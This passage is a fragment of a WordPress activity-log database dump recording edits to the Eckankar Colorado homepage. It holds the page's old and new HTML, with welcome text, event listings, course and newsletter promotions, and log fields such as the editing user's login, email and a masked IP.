data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241335,41021,'post_id','7160'),(241336,41021,'post_type','page'),(241337,41021,'post_title','Home'),(241334,41020,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241333,41020,'_server_remote_addr','76.130.120.x'),(241332,41020,'_user_email','nada@zipnadanot.org'),(241331,41020,'_user_login','S8zhaBda'),(241330,41020,'_user_id','2'),(241329,41020,'_message_key','post_updated'),(241328,41020,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241318,41019,'_message_key','post_updated'),(241319,41019,'_user_id','2'),(241320,41019,'_user_login','S8zhaBda'),(241321,41019,'_user_email','nada@zipnadanot.org'),(241322,41019,'_server_remote_addr','76.130.120.x'),(241323,41019,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241324,41020,'post_id','7160'),(241325,41020,'post_type','page'),(241326,41020,'post_title','Home'),(241327,41020,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL 